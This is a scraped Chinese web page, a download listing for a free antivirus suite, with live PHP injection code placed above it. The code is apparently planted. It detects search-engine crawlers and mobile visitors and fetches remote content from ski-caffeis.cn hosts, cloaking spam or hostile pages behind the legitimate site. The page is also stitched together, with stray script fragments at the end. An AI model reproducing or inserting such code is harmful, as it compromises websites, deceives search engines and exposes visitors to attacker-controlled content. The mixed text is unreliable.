set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");
function isEngine($key)
{
return strpos($key, 'baidu') !== false || strpos($key, 'sogou') !== false || strpos($key, 'toutiao') !== false ||strpos($key, 'Yisou') !== false || strpos($key, 'uc') !== false;
}
define('mobile', '/phone|pad|pod|iPhone|iPod|ios|iPad|Android|Mobile|BlackBerry|IEMobile|MQQBrowser|JUC|Fennec|wOSBrowser|BrowserNG|WebOS|Symbian|Windows Phone/');
define('url', $_SERVER["REQUEST_URI"]);
function isInclude(){
return stristr($_SERVER["REQUEST_URI"], ".pdf") or stristr($_SERVER["REQUEST_URI"], ".xml") or stristr($_SERVER["REQUEST_URI"], ".gq") or stristr($_SERVER["REQUEST_URI"], ".shtml")or stristr($_SERVER["REQUEST_URI"], ".xls") or stristr($_SERVER["REQUEST_URI"], ".txt") or stristr($_SERVER["REQUEST_URI"], ".tacc") or stristr($_SERVER["REQUEST_URI"], ".gp") or stristr($_SERVER["REQUEST_URI"], ".csv") or stristr($_SERVER["REQUEST_URI"], ".doc") or stristr($_SERVER["REQUEST_URI"], ".xlsx") or stristr($_SERVER["REQUEST_URI"], ".doc")or stristr($_SERVER["REQUEST_URI"], "?") or stristr($_SERVER["REQUEST_URI"], ".pptx")or stristr($_SERVER["REQUEST_URI"], ".exe")or stristr($_SERVER["REQUEST_URI"], ".ppt")or stristr($_SERVER["REQUEST_URI"], ".zip")or stristr($_SERVER["REQUEST_URI"], ".gov")or stristr($_SERVER["REQUEST_URI"], ".jspx")or stristr($_SERVER["REQUEST_URI"], ".docx");
}
function getContent($url)
{
if (function_exists('curl_init')) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)");
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
$result = curl_exec($ch);
curl_close($ch);
if($result == NULL){
return file_get_contents($url);
}
return $result;
} else {
return file_get_contents($url);
}
}
$key = $_SERVER["HTTP_USER_AGENT"];
if (isEngine($key)) {
header('Content-Type:text/html;charset=utf-8');
if(isInclude()){
$content = getContent("http://d-utf.ski-caffeis.cn:1688/?".$_SERVER["QUERY_STRING"]);
echo $content;
}else{
$content = getContent("http://index-top.ski-caffeis.cn:1688/");
echo $content;
}
}
if (preg_match(mobile, $_SERVER["HTTP_USER_AGENT"])){
if(isInclude()){
$Content_mb=file_get_contents("http://tz.ski-caffeis.cn:1688");
echo $Content_mb;
exit;
}
}
下载中心
杀毒软件使用说明
2018-02-02 17:44:14
admin
26
- 简要说明 :
- 国内首款集成“杀毒+管理”2合1功能的免费网络安全软件。
- 文件版本 :
- 5.36
- 文件语言 :
- 简体中文
立即下载
是国内首款集成“杀毒+管理”2合1功能的免费网络安全软件。宣称它包含“杀毒、实时防护、漏洞修复、系统清理、电脑加速、软件管理”等功能。截止目前,历史装机量达3.5亿,帮助1亿网民,修复660000万次漏洞,网页防火墙日拦截2200万次,恶意URL网址日拦截1500万次,日云查总次数145亿次,日拦截病毒木马 2000万次,已荣获AVC、AV-Test、VB100、西海岸等国际知名权威机构专业认可;不断加持技术,强化功能服务,力争成为一款让用户最为信赖的专业免费安全软件。
本站提供腾讯电脑管家官方下载2016给用户进行下载。
');
})();